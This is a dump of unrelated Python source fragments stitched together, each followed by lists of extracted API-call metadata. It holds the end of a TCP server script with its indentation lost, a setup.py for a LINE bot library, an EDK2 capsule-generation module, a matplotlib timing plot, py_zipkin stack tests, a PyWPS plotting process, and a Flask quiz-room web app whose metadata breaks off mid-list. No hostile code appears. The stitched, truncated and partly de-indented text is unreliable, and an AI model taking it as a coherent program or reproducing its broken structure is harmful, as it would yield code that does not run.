UTIL.TASK.s_processingTask.createTimeHandler(1000, idleFunction)
LOG("--- idle ---")
########
# main #
########
if __name__ == "__main__":
# initialise the system configuration
initConfiguration()
# initialise the console handler
consoleHandler = UTIL.TASK.ConsoleHandler()
# initialise the model
modelTask = UTIL.TASK.ProcessingTask(isParent=True)
# register the console handler
modelTask.registerConsoleHandler(consoleHandler)
# create the TCP server
LOG("Open the TCP server")
createServer()
# start the tasks
LOG("start modelTask...")
modelTask.start()
| [
"UTIL.SYS.LOG",
"sys.exit"
] | [((5003, 5022), 'UTIL.SYS.LOG', 'LOG', (['"""--- idle ---"""'], {}), "('--- idle ---')\n", (5006, 5022), False, 'from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR\n'), ((5412, 5438), 'UTIL.SYS.LOG', 'LOG', (['"""Open the TCP server"""'], {}), "('Open the TCP server')\n", (5415, 5438), False, 'from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR\n'), ((5478, 5503), 'UTIL.SYS.LOG', 'LOG', (['"""start modelTask..."""'], {}), "('start modelTask...')\n", (5481, 5503), False, 'from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR\n'), ((1987, 2017), 'UTIL.SYS.LOG', 'LOG', (['"""*** receiveCallback ***"""'], {}), "('*** receiveCallback ***')\n", (1990, 2017), False, 'from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR\n'), ((2271, 2309), 'UTIL.SYS.LOG', 'LOG', (["('tcpLineBuffer: ' + tcpLineBuffer)"], {}), "('tcpLineBuffer: ' + tcpLineBuffer)\n", (2274, 2309), False, 'from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR\n'), ((4176, 4197), 'UTIL.SYS.LOG', 'LOG', (["('line = ' + line)"], {}), "('line = ' + line)\n", (4179, 4197), False, 'from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR\n'), ((4770, 4782), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (4778, 4782), False, 'import sys\n'), ((3070, 3091), 'UTIL.SYS.LOG', 'LOG', (['"""Exit requested"""'], {}), "('Exit requested')\n", (3073, 3091), False, 'from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR\n'), ((3359, 3380), 'UTIL.SYS.LOG', 'LOG', (['"""Quit requested"""'], {}), "('Quit requested')\n", (3362, 3380), False, 'from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR\n'), ((3579, 3590), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (3587, 3590), False, 'import sys\n'), ((3689, 3698), 'UTIL.SYS.LOG', 'LOG', (['"""OK"""'], {}), "('OK')\n", (3692, 3698), False, 'from UTIL.SYS import Error, LOG, LOG_INFO, LOG_WARNING, LOG_ERROR\n')] |
from setuptools import setup, find_packages
with open("README.md", 'r',encoding="utf-8") as f:
long_description = f.read()
setup(
name='LineBot',
version='0.1.0',
description='Simple-LINELIB',
long_description=long_description,
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/CyberTKR/Simple-LINELIB',
packages=find_packages(include=['CyberTK', 'CyberTK.*']),
install_requires=[
'httpx==0.19.0',
'requests',
'thrift',
'CyberTKAPI'
],
extras_require={'httpx': ['http2']}
)
| [
"setuptools.find_packages"
] | [((366, 413), 'setuptools.find_packages', 'find_packages', ([], {'include': "['CyberTK', 'CyberTK.*']"}), "(include=['CyberTK', 'CyberTK.*'])\n", (379, 413), False, 'from setuptools import setup, find_packages\n')] |
## @file
# generate capsule
#
# Copyright (c) 2007-2017, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
import Ffs
from GenFdsGlobalVariable import GenFdsGlobalVariable
import StringIO
from struct import pack
import os
from Common.Misc import SaveFileOnChange
import uuid
## base class for capsule data
#
#
class CapsuleData:
## The constructor
#
# @param self The object pointer
def __init__(self):
pass
## generate capsule data
#
# @param self The object pointer
def GenCapsuleSubItem(self):
pass
## FFS class for capsule data
#
#
class CapsuleFfs (CapsuleData):
## The constructor
#
# @param self The object pointer
#
def __init__(self) :
self.Ffs = None
self.FvName = None
## generate FFS capsule data
#
# @param self The object pointer
# @retval string Generated file name
#
def GenCapsuleSubItem(self):
FfsFile = self.Ffs.GenFfs()
return FfsFile
## FV class for capsule data
#
#
class CapsuleFv (CapsuleData):
## The constructor
#
# @param self The object pointer
#
def __init__(self) :
self.Ffs = None
self.FvName = None
self.CapsuleName = None
## generate FV capsule data
#
# @param self The object pointer
# @retval string Generated file name
#
def GenCapsuleSubItem(self):
if self.FvName.find('.fv') == -1:
if self.FvName.upper() in GenFdsGlobalVariable.FdfParser.Profile.FvDict.keys():
FvObj = GenFdsGlobalVariable.FdfParser.Profile.FvDict.get(self.FvName.upper())
FdBuffer = StringIO.StringIO('')
FvObj.CapsuleName = self.CapsuleName
FvFile = FvObj.AddToBuffer(FdBuffer)
FvObj.CapsuleName = None
FdBuffer.close()
return FvFile
else:
FvFile = GenFdsGlobalVariable.ReplaceWorkspaceMacro(self.FvName)
return FvFile
## FD class for capsule data
#
#
class CapsuleFd (CapsuleData):
## The constructor
#
# @param self The object pointer
#
def __init__(self) :
self.Ffs = None
self.FdName = None
self.CapsuleName = None
## generate FD capsule data
#
# @param self The object pointer
# @retval string Generated file name
#
def GenCapsuleSubItem(self):
if self.FdName.find('.fd') == -1:
if self.FdName.upper() in GenFdsGlobalVariable.FdfParser.Profile.FdDict.keys():
FdObj = GenFdsGlobalVariable.FdfParser.Profile.FdDict.get(self.FdName.upper())
FdFile = FdObj.GenFd()
return FdFile
else:
FdFile = GenFdsGlobalVariable.ReplaceWorkspaceMacro(self.FdName)
return FdFile
## AnyFile class for capsule data
#
#
class CapsuleAnyFile (CapsuleData):
## The constructor
#
# @param self The object pointer
#
def __init__(self) :
self.Ffs = None
self.FileName = None
## generate AnyFile capsule data
#
# @param self The object pointer
# @retval string Generated file name
#
def GenCapsuleSubItem(self):
return self.FileName
## Afile class for capsule data
#
#
class CapsuleAfile (CapsuleData):
## The constructor
#
# @param self The object pointer
#
def __init__(self) :
self.Ffs = None
self.FileName = None
## generate Afile capsule data
#
# @param self The object pointer
# @retval string Generated file name
#
def GenCapsuleSubItem(self):
return self.FileName
class CapsulePayload(CapsuleData):
'''Generate payload file, the header is defined below:
#pragma pack(1)
typedef struct {
UINT32 Version;
EFI_GUID UpdateImageTypeId;
UINT8 UpdateImageIndex;
UINT8 reserved_bytes[3];
UINT32 UpdateImageSize;
UINT32 UpdateVendorCodeSize;
UINT64 UpdateHardwareInstance; //Introduced in v2
} EFI_FIRMWARE_MANAGEMENT_CAPSULE_IMAGE_HEADER;
'''
def __init__(self):
self.UiName = None
self.Version = None
self.ImageTypeId = None
self.ImageIndex = None
self.HardwareInstance = None
self.ImageFile = []
self.VendorCodeFile = []
self.Certificate_Guid = None
self.MonotonicCount = None
self.Existed = False
self.Buffer = None
def GenCapsuleSubItem(self, AuthData=[]):
if not self.Version:
self.Version = '0x00000002'
if not self.ImageIndex:
self.ImageIndex = '0x1'
if not self.HardwareInstance:
self.HardwareInstance = '0x0'
ImageFileSize = os.path.getsize(self.ImageFile)
if AuthData:
# the ImageFileSize need include the full authenticated info size. From first bytes of MonotonicCount to last bytes of certificate.
# the 32 bit is the MonotonicCount, dwLength, wRevision, wCertificateType and CertType
ImageFileSize += 32
VendorFileSize = 0
if self.VendorCodeFile:
VendorFileSize = os.path.getsize(self.VendorCodeFile)
#
# Fill structure
#
Guid = self.ImageTypeId.split('-')
Buffer = pack('=ILHHBBBBBBBBBBBBIIQ',
int(self.Version,16),
int(Guid[0], 16),
int(Guid[1], 16),
int(Guid[2], 16),
int(Guid[3][-4:-2], 16),
int(Guid[3][-2:], 16),
int(Guid[4][-12:-10], 16),
int(Guid[4][-10:-8], 16),
int(Guid[4][-8:-6], 16),
int(Guid[4][-6:-4], 16),
int(Guid[4][-4:-2], 16),
int(Guid[4][-2:], 16),
int(self.ImageIndex, 16),
0,
0,
0,
ImageFileSize,
VendorFileSize,
int(self.HardwareInstance, 16)
)
if AuthData:
Buffer += pack('QIHH', AuthData[0], AuthData[1], AuthData[2], AuthData[3])
Buffer += uuid.UUID(AuthData[4]).get_bytes_le()
#
# Append file content to the structure
#
ImageFile = open(self.ImageFile, 'rb')
Buffer += ImageFile.read()
ImageFile.close()
if self.VendorCodeFile:
VendorFile = open(self.VendorCodeFile, 'rb')
Buffer += VendorFile.read()
VendorFile.close()
self.Existed = True
return Buffer
| [
"GenFdsGlobalVariable.GenFdsGlobalVariable.ReplaceWorkspaceMacro",
"StringIO.StringIO",
"os.path.getsize",
"uuid.UUID",
"struct.pack",
"GenFdsGlobalVariable.GenFdsGlobalVariable.FdfParser.Profile.FvDict.keys",
"GenFdsGlobalVariable.GenFdsGlobalVariable.FdfParser.Profile.FdDict.keys"
] | [((5358, 5389), 'os.path.getsize', 'os.path.getsize', (['self.ImageFile'], {}), '(self.ImageFile)\n', (5373, 5389), False, 'import os\n'), ((2439, 2494), 'GenFdsGlobalVariable.GenFdsGlobalVariable.ReplaceWorkspaceMacro', 'GenFdsGlobalVariable.ReplaceWorkspaceMacro', (['self.FvName'], {}), '(self.FvName)\n', (2481, 2494), False, 'from GenFdsGlobalVariable import GenFdsGlobalVariable\n'), ((3282, 3337), 'GenFdsGlobalVariable.GenFdsGlobalVariable.ReplaceWorkspaceMacro', 'GenFdsGlobalVariable.ReplaceWorkspaceMacro', (['self.FdName'], {}), '(self.FdName)\n', (3324, 3337), False, 'from GenFdsGlobalVariable import GenFdsGlobalVariable\n'), ((5774, 5810), 'os.path.getsize', 'os.path.getsize', (['self.VendorCodeFile'], {}), '(self.VendorCodeFile)\n', (5789, 5810), False, 'import os\n'), ((6829, 6893), 'struct.pack', 'pack', (['"""QIHH"""', 'AuthData[0]', 'AuthData[1]', 'AuthData[2]', 'AuthData[3]'], {}), "('QIHH', AuthData[0], AuthData[1], AuthData[2], AuthData[3])\n", (6833, 6893), False, 'from struct import pack\n'), ((1996, 2048), 'GenFdsGlobalVariable.GenFdsGlobalVariable.FdfParser.Profile.FvDict.keys', 'GenFdsGlobalVariable.FdfParser.Profile.FvDict.keys', ([], {}), '()\n', (2046, 2048), False, 'from GenFdsGlobalVariable import GenFdsGlobalVariable\n'), ((2172, 2193), 'StringIO.StringIO', 'StringIO.StringIO', (['""""""'], {}), "('')\n", (2189, 2193), False, 'import StringIO\n'), ((3029, 3081), 'GenFdsGlobalVariable.GenFdsGlobalVariable.FdfParser.Profile.FdDict.keys', 'GenFdsGlobalVariable.FdfParser.Profile.FdDict.keys', ([], {}), '()\n', (3079, 3081), False, 'from GenFdsGlobalVariable import GenFdsGlobalVariable\n'), ((6916, 6938), 'uuid.UUID', 'uuid.UUID', (['AuthData[4]'], {}), '(AuthData[4])\n', (6925, 6938), False, 'import uuid\n')] |
import matplotlib.pyplot as plt
import numpy as np
# Read data
size = []
time = []
with open("pi_linear.txt") as file:
for line in file.readlines():
x, y = line.split(',')
size.append(int(x.strip()))
time.append(float(y.strip()))
# Plot data
fig, ax = plt.subplots()
ax.plot(size, time)
ax.set(xlabel='Num. processes', ylabel='Time (s)',
title='Pi linear')
#ax.grid()
fig.savefig("pi_linear.png")
plt.show()
| [
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.show"
] | [((288, 302), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (300, 302), True, 'import matplotlib.pyplot as plt\n'), ((442, 452), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (450, 452), True, 'import matplotlib.pyplot as plt\n')] |
import mock
import pytest
import py_zipkin.storage
@pytest.fixture(autouse=True, scope="module")
def create_zipkin_attrs():
# The following tests all expect _thread_local.zipkin_attrs to exist: if it
# doesn't, mock.patch will fail.
py_zipkin.storage.ThreadLocalStack().get()
def test_get_zipkin_attrs_returns_none_if_no_zipkin_attrs():
tracer = py_zipkin.storage.get_default_tracer()
with mock.patch.object(tracer._context_stack, "_storage", []):
assert not py_zipkin.storage.ThreadLocalStack().get()
assert not py_zipkin.storage.ThreadLocalStack().get()
def test_get_zipkin_attrs_with_context_returns_none_if_no_zipkin_attrs():
with mock.patch.object(py_zipkin.storage.log, "warning", autospec=True) as log:
assert not py_zipkin.storage.Stack([]).get()
assert log.call_count == 1
def test_storage_stack_still_works_if_you_dont_pass_in_storage():
# Let's make sure this still works if we don't pass in a custom storage.
assert not py_zipkin.storage.Stack().get()
def test_get_zipkin_attrs_returns_the_last_of_the_list():
tracer = py_zipkin.storage.get_default_tracer()
with mock.patch.object(tracer._context_stack, "_storage", ["foo"]):
assert "foo" == py_zipkin.storage.ThreadLocalStack().get()
def test_get_zipkin_attrs_with_context_returns_the_last_of_the_list():
assert "foo" == py_zipkin.storage.Stack(["bar", "foo"]).get()
def test_pop_zipkin_attrs_does_nothing_if_no_requests():
tracer = py_zipkin.storage.get_default_tracer()
with mock.patch.object(tracer._context_stack, "_storage", []):
assert not py_zipkin.storage.ThreadLocalStack().pop()
def test_pop_zipkin_attrs_with_context_does_nothing_if_no_requests():
assert not py_zipkin.storage.Stack([]).pop()
def test_pop_zipkin_attrs_removes_the_last_zipkin_attrs():
tracer = py_zipkin.storage.get_default_tracer()
with mock.patch.object(tracer._context_stack, "_storage", ["foo", "bar"]):
assert "bar" == py_zipkin.storage.ThreadLocalStack().pop()
assert "foo" == py_zipkin.storage.ThreadLocalStack().get()
def test_pop_zipkin_attrs_with_context_removes_the_last_zipkin_attrs():
context_stack = py_zipkin.storage.Stack(["foo", "bar"])
assert "bar" == context_stack.pop()
assert "foo" == context_stack.get()
def test_push_zipkin_attrs_adds_new_zipkin_attrs_to_list():
tracer = py_zipkin.storage.get_default_tracer()
with mock.patch.object(tracer._context_stack, "_storage", ["foo"]):
assert "foo" == py_zipkin.storage.ThreadLocalStack().get()
py_zipkin.storage.ThreadLocalStack().push("bar")
assert "bar" == py_zipkin.storage.ThreadLocalStack().get()
def test_push_zipkin_attrs_with_context_adds_new_zipkin_attrs_to_list():
stack = py_zipkin.storage.Stack(["foo"])
assert "foo" == stack.get()
stack.push("bar")
assert "bar" == stack.get()
def test_stack_copy():
stack = py_zipkin.storage.Stack()
stack.push("a")
stack.push("b")
the_copy = stack.copy()
the_copy.push("c")
stack.push("d")
assert ["a", "b", "c"] == the_copy._storage
assert ["a", "b", "d"] == stack._storage
| [
"pytest.fixture",
"mock.patch.object"
] | [((55, 99), 'pytest.fixture', 'pytest.fixture', ([], {'autouse': '(True)', 'scope': '"""module"""'}), "(autouse=True, scope='module')\n", (69, 99), False, 'import pytest\n'), ((415, 471), 'mock.patch.object', 'mock.patch.object', (['tracer._context_stack', '"""_storage"""', '[]'], {}), "(tracer._context_stack, '_storage', [])\n", (432, 471), False, 'import mock\n'), ((682, 748), 'mock.patch.object', 'mock.patch.object', (['py_zipkin.storage.log', '"""warning"""'], {'autospec': '(True)'}), "(py_zipkin.storage.log, 'warning', autospec=True)\n", (699, 748), False, 'import mock\n'), ((1158, 1219), 'mock.patch.object', 'mock.patch.object', (['tracer._context_stack', '"""_storage"""', "['foo']"], {}), "(tracer._context_stack, '_storage', ['foo'])\n", (1175, 1219), False, 'import mock\n'), ((1547, 1603), 'mock.patch.object', 'mock.patch.object', (['tracer._context_stack', '"""_storage"""', '[]'], {}), "(tracer._context_stack, '_storage', [])\n", (1564, 1603), False, 'import mock\n'), ((1910, 1978), 'mock.patch.object', 'mock.patch.object', (['tracer._context_stack', '"""_storage"""', "['foo', 'bar']"], {}), "(tracer._context_stack, '_storage', ['foo', 'bar'])\n", (1927, 1978), False, 'import mock\n'), ((2451, 2512), 'mock.patch.object', 'mock.patch.object', (['tracer._context_stack', '"""_storage"""', "['foo']"], {}), "(tracer._context_stack, '_storage', ['foo'])\n", (2468, 2512), False, 'import mock\n')] |
from pywps import Process, LiteralInput, ComplexInput, ComplexOutput
from pywps import Format
import logging
LOGGER = logging.getLogger('PYWPS')
import matplotlib
# no X11 server ... must be run first
# https://github.com/matplotlib/matplotlib/issues/3466/
matplotlib.use('Agg')
import matplotlib.pylab as plt
import cartopy.crs as ccrs
from netCDF4 import Dataset
AIR_DS = 'https://www.esrl.noaa.gov/psd/thredds/fileServer/Datasets/ncep.reanalysis.derived/surface/air.mon.ltm.nc'
def simple_plot(resource, variable=None, output=None):
output = output or 'plot.png'
ds = Dataset(resource)
values = ds.variables[variable]
fig = plt.figure(figsize=(20, 10))
ax = plt.axes(projection=ccrs.PlateCarree())
plt.contourf(values[0, :, :])
ax.stock_img()
ax.coastlines()
plt.colorbar()
fig.savefig(output)
plt.close()
return output
class SimplePlot(Process):
def __init__(self):
inputs = [
ComplexInput('dataset', 'Dataset', supported_formats=[Format('application/x-netcdf')],
default=AIR_DS,
abstract='Example: {0}'.format(AIR_DS)),
LiteralInput('variable', 'Variable', data_type='string',
default='air',
abstract='Please enter the variable name to be plotted, example: air'),
]
outputs = [
ComplexOutput('output', 'Simple Plot', supported_formats=[Format('image/png')],
as_reference=True),
]
super(SimplePlot, self).__init__(
self._handler,
identifier='simple_plot',
title='Simple Plot',
abstract='Returns a nice and simple plot.',
version='1.0',
inputs=inputs,
outputs=outputs,
store_supported=True,
status_supported=True
)
def _handler(self, request, response):
variable = request.inputs['variable'][0].data
output = simple_plot(
resource=request.inputs['dataset'][0].file,
variable=variable)
LOGGER.info("produced output: %s", output)
response.outputs['output'].file = output
response.update_status("simple_plot done", 100)
return response
| [
"logging.getLogger",
"pywps.LiteralInput",
"pywps.Format",
"matplotlib.pylab.figure",
"matplotlib.use",
"netCDF4.Dataset",
"cartopy.crs.PlateCarree",
"matplotlib.pylab.colorbar",
"matplotlib.pylab.contourf",
"matplotlib.pylab.close"
] | [((120, 146), 'logging.getLogger', 'logging.getLogger', (['"""PYWPS"""'], {}), "('PYWPS')\n", (137, 146), False, 'import logging\n'), ((260, 281), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (274, 281), False, 'import matplotlib\n'), ((586, 603), 'netCDF4.Dataset', 'Dataset', (['resource'], {}), '(resource)\n', (593, 603), False, 'from netCDF4 import Dataset\n'), ((650, 678), 'matplotlib.pylab.figure', 'plt.figure', ([], {'figsize': '(20, 10)'}), '(figsize=(20, 10))\n', (660, 678), True, 'import matplotlib.pylab as plt\n'), ((732, 761), 'matplotlib.pylab.contourf', 'plt.contourf', (['values[0, :, :]'], {}), '(values[0, :, :])\n', (744, 761), True, 'import matplotlib.pylab as plt\n'), ((805, 819), 'matplotlib.pylab.colorbar', 'plt.colorbar', ([], {}), '()\n', (817, 819), True, 'import matplotlib.pylab as plt\n'), ((848, 859), 'matplotlib.pylab.close', 'plt.close', ([], {}), '()\n', (857, 859), True, 'import matplotlib.pylab as plt\n'), ((708, 726), 'cartopy.crs.PlateCarree', 'ccrs.PlateCarree', ([], {}), '()\n', (724, 726), True, 'import cartopy.crs as ccrs\n'), ((1168, 1314), 'pywps.LiteralInput', 'LiteralInput', (['"""variable"""', '"""Variable"""'], {'data_type': '"""string"""', 'default': '"""air"""', 'abstract': '"""Please enter the variable name to be plotted, example: air"""'}), "('variable', 'Variable', data_type='string', default='air',\n abstract='Please enter the variable name to be plotted, example: air')\n", (1180, 1314), False, 'from pywps import Process, LiteralInput, ComplexInput, ComplexOutput\n'), ((1016, 1046), 'pywps.Format', 'Format', (['"""application/x-netcdf"""'], {}), "('application/x-netcdf')\n", (1022, 1046), False, 'from pywps import Format\n'), ((1462, 1481), 'pywps.Format', 'Format', (['"""image/png"""'], {}), "('image/png')\n", (1468, 1481), False, 'from pywps import Format\n')] |
# -*- coding: utf-8 -*-
import json
import os.path
import random
import re
from flask import Flask, send_from_directory
from flask import request, abort
from flaskrun.flaskrun import flask_run
import datab.social_database as db
app = Flask(__name__)
# Regular expression to only accept certain files
fileChecker = re.compile(r"(.*\.js|.*\.html|.*\.png|.*\.css|.*\.map)$")
numberOfAnswers = 4
random.seed(7)
def root_dir(): # pragma: no cover
return os.path.abspath(os.path.dirname(__file__))
@app.route('/')
def root():
return index("index2.html")
@app.route('/<path:filename>')
def index(filename):
if fileChecker.match(filename):
return send_from_directory(os.path.join(root_dir(), 'static'), filename)
abort(403)
@app.route('/register')
def register():
# To obtain the mail
email = request.args.get('email')
print(email)
if email is None:
return json.dumps({})
id_user = db.register_or_get_email(email)
return json.dumps({"id": id_user})
@app.route('/join_room')
def join_room():
room_id = request.args.get('room_id')
email = request.args.get('email')
user_id = db.register_or_get_email(email)
db.exec_query("REPLACE INTO room_members (room_id, user_id) VALUES (%s,%s)", [room_id, user_id])
return json.dumps({"id": user_id})
@app.route('/answered_room')
def answered_room():
room_id = request.args.get('room_id')
user_id = request.args.get('user_id')
values = db.exec_query("SELECT a.id "
"FROM answer a INNER JOIN question q "
"WHERE a.question_id = q.id AND q.room_id = %s AND a.user_id= %s",
[room_id, user_id])
return json.dumps({"answered": len(values) > 0})
@app.route('/get_user_id')
def get_user_id():
email = request.args.get('email')
id_user = db.register_or_get_email(email)
return json.dumps({"id": id_user})
@app.route('/create_room')
def create_room():
user_id = request.args.get('user_id')
room_id = db.exec_query("INSERT INTO room (creator) VALUES (%s)", [user_id])
return json.dumps({"id": room_id})
@app.route('/get_rooms')
def get_rooms():
user_id = request.args.get('user_id')
values = db.exec_query("SELECT r.id, r.status FROM room r WHERE r.creator=%s", [user_id])
response = []
for val in values:
response.append({"id": val[0], "status": val[1]})
return json.dumps(response)
@app.route('/fill_room', methods=['POST'])
def fill_room():
json_data = request.get_json()
if json_data is None:
return json.dumps({"error": "no JSON found"})
else:
room_id = json_data["room_id"]
questions = json_data["question"]
for q in questions:
db.exec_query("INSERT INTO question (room_id, question) VALUES (%s, %s)", [room_id, q])
return json.dumps({"info": "Data received"})
@app.route('/open_room')
def open_room():
room_id = request.args.get('room_id')
print(room_id)
db.exec_query("UPDATE room r SET r.status='started' WHERE r.id = %s", [room_id])
return json.dumps({"info": "The room has been opened successfully", "status": "started"})
@app.route('/close_room')
def close_room():
room_id = request.args.get('room_id')
db.exec_query("UPDATE room r SET r.status='closed' WHERE r.id = %s", [room_id])
return json.dumps({"info": "The room has been closed successfully", "status": "closed"})
@app.route('/finish_room')
def finish_room():
room_id = request.args.get('room_id')
db.exec_query("UPDATE room r SET r.status='finished' WHERE r.id = %s", [room_id])
# for
# SELECT id, COUNT(a.id), COUNT(a.id) FROM Room r INNER JOIN
values = db.exec_query("SELECT u.email , COUNT(qq.id) "
"FROM quiz_question qq "
"INNER JOIN users u ON (qq.asked_user_id = u.id) "
"INNER JOIN room_members rm ON (u.id = rm.user_id) "
"WHERE qq.correct_answer_id = qq.answered_id AND rm.room_id = %s "
"GROUP BY u.email "
"ORDER BY COUNT(qq.id) DESC",
[room_id])
ranking = []
for row in values:
ranking.append({"email": row[0], "correct": row[1]})
return json.dumps({"ranking": ranking})
@app.route('/room_status')
def status_room():
room_id = request.args.get('room_id')
# SELECT status FROM Room WHERE id = 1
values = db.exec_query("SELECT status FROM room WHERE id = %s", [room_id])
return json.dumps({
"status": values[0][0]
})
@app.route('/get_room_questions')
def get_room_question():
room_id = request.args.get('room_id')
values = db.exec_query("SELECT id, question FROM question WHERE room_id = %s", [room_id])
response = []
for val in values:
response.append({"id": val[0], "text": val[1]})
return json.dumps({"questions": response})
@app.route('/post_room_answers', methods=['POST'])
def post_room_answers():
json_data = request.get_json()
if json_data is None:
return json.dumps({"error": "no JSON found"}), 404
user_id = json_data["user_id"]
values = []
for a in json_data["answers"]:
values.append((a["id"], user_id, a["text"]))
print(values[len(values) - 1])
db.exec_many_query("INSERT INTO answer (question_id, user_id, answer) VALUES(%s,%s,%s)", values)
return json.dumps({"info": "Data received"})
@app.route('/get_quiz_question')
def get_question():
room_id = int(request.args.get('room_id'))
user_id = int(request.args.get('user_id'))
possible_questions = db.get_non_answered_questions(room_id, user_id)
possible_users_to_ask = db.get_non_answered_people(room_id, user_id)
question_id = []
asked_about_id = []
if len(possible_questions) > 0:
question_id = random.sample(possible_questions, 1)
else:
possible_questions = db.get_all_questions(room_id)
if len(possible_questions) > 0:
question_id = random.sample(possible_questions, 1)
if len(possible_users_to_ask) > 0:
asked_about_id = random.sample(possible_users_to_ask, 1)
else:
possible_users_to_ask = db.get_all_different_people(room_id, user_id)
if len(possible_questions) > 0:
asked_about_id = random.sample(possible_users_to_ask, 1)
if len(question_id) > 0 and 0 < len(asked_about_id):
quiz_question_id = db.insert_quiz_question(user_id, asked_about_id[0], question_id[0])
other_users = db.get_all_different_people(room_id, asked_about_id[0])
random.shuffle(other_users)
answers = []
(answer_id, text_id) = db.get_answer(question_id[0], asked_about_id[0])
db.exec_query("UPDATE quiz_question SET correct_answer_id=%s WHERE id = %s", [answer_id, quiz_question_id])
answers.append((answer_id, text_id))
if min(numberOfAnswers - 1, len(other_users)) > 0:
for i in range(min(numberOfAnswers - 1, len(other_users))):
(answer_id, text_id) = db.get_answer(question_id[0], other_users[i])
answers.append((answer_id, text_id))
# if commented the first answer will be the correct one
random.shuffle(answers)
answer_json = []
for (answer_id, text_id) in answers:
answer_json.append({"id": answer_id, "text": text_id})
print(quiz_question_id)
# SELECT 'question' FROM 'Question' WHERE 'id' = 3
value = db.exec_query("SELECT id "
"FROM quiz_question "
"WHERE asked_user_id = %s AND about_user_id = %s AND question_id = %s",
[user_id, asked_about_id[0], question_id[0]])
quiz_question_id = value[0][0]
value = db.exec_query("SELECT q.question "
"FROM question q "
"WHERE q.id = %s",
[question_id[0]])
question_text = value[0][0]
value = db.exec_query("SELECT u.email "
"FROM users u "
"WHERE u.id=%s",
[asked_about_id[0]])
user_name = value[0][0]
question_text = "What did %s answer to '%s' ?" % (user_name, question_text)
return json.dumps({
"id": quiz_question_id,
"question": question_text,
"answers": answer_json
})
else:
return json.dumps({"error": "Not available questions for this user in this room"})
@app.route('/post_quiz_answer')
def post_answer():
quiz_question_id = request.args.get('quiz_question_id')
quiz_answer_id = request.args.get('quiz_answer_id')
db.exec_query("UPDATE quiz_question SET answered_id = %s WHERE id = %s", [quiz_answer_id, quiz_question_id])
value = db.exec_query("SELECT qq.answered_id, qq.correct_answer_id, qq.question_id "
"FROM quiz_question qq "
"WHERE qq.id = %s", [quiz_question_id])
answered_id = value[0][0]
correct_answer_id = value[0][1]
question_id = value[0][2]
value = db.exec_query("SELECT a.answer FROM answer a WHERE a.id = %s ", [correct_answer_id])
if len(value) > 0:
text = value[0][0]
else:
text = "something when wrong"
if value is None:
return json.dumps({"error": "Internal server error"})
return json.dumps({
"correct": answered_id == correct_answer_id,
"question": question_id,
"correct_answer": {"id": correct_answer_id, "text": text}
})
if __name__ == '__main__':
flask_run(app)
| [
"flask.request.args.get",
"re.compile",
"flask.Flask",
"datab.social_database.exec_many_query",
"datab.social_database.insert_quiz_question",
"json.dumps",
"datab.social_database.register_or_get_email",
"datab.social_database.get_all_different_people",
"flask.abort",
"random.sample",
"flaskrun.flaskrun.flask_run",
"random.shuffle",
"datab.social_database.exec_query",
"flask.request.get_json",
"datab.social_database.get_non_answered_questions",
"datab.social_database.get_non_answered_people",
"random.seed",
"datab.social_database.get_all_questions",
"datab.social_database.get_answer"
] | [((238, 253), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (243, 253), False, 'from flask import Flask, send_from_directory\n'), ((319, 380), 're.compile', 're.compile', (['"""(.*\\\\.js|.*\\\\.html|.*\\\\.png|.*\\\\.css|.*\\\\.map)$"""'], {}), "('(.*\\\\.js|.*\\\\.html|.*\\\\.png|.*\\\\.css|.*\\\\.map)$')\n", (329, 380), False, 'import re\n'), ((398, 412), 'random.seed', 'random.seed', (['(7)'], {}), '(7)\n', (409, 412), False, 'import random\n'), ((742, 752), 'flask.abort', 'abort', (['(403)'], {}), '(403)\n', (747, 752), False, 'from flask import request, abort\n'), ((832, 857), 'flask.request.args.get', 'request.args.get', (['"""email"""'], {}), "('email')\n", (848, 857), False, 'from flask import request, abort\n'), ((942, 973), 'datab.social_database.register_or_get_email', 'db.register_or_get_email', (['email'], {}), '(email)\n', (966, 973), True, 'import datab.social_database as db\n'), ((985, 1012), 'json.dumps', 'json.dumps', (["{'id': id_user}"], {}), "({'id': id_user})\n", (995, 1012), False, 'import json\n'), ((1071, 1098), 'flask.request.args.get', 'request.args.get', (['"""room_id"""'], {}), "('room_id')\n", (1087, 1098), False, 'from flask import request, abort\n'), ((1111, 1136), 'flask.request.args.get', 'request.args.get', (['"""email"""'], {}), "('email')\n", (1127, 1136), False, 'from flask import request, abort\n'), ((1151, 1182), 'datab.social_database.register_or_get_email', 'db.register_or_get_email', (['email'], {}), '(email)\n', (1175, 1182), True, 'import datab.social_database as db\n'), ((1187, 1287), 'datab.social_database.exec_query', 'db.exec_query', (['"""REPLACE INTO room_members (room_id, user_id) VALUES (%s,%s)"""', '[room_id, user_id]'], {}), "('REPLACE INTO room_members (room_id, user_id) VALUES (%s,%s)',\n [room_id, user_id])\n", (1200, 1287), True, 'import datab.social_database as db\n'), ((1295, 1322), 'json.dumps', 'json.dumps', (["{'id': user_id}"], {}), "({'id': user_id})\n", (1305, 1322), False, 'import json\n'), ((1389, 1416), 'flask.request.args.get', 'request.args.get', (['"""room_id"""'], {}), "('room_id')\n", (1405, 1416), False, 'from flask import 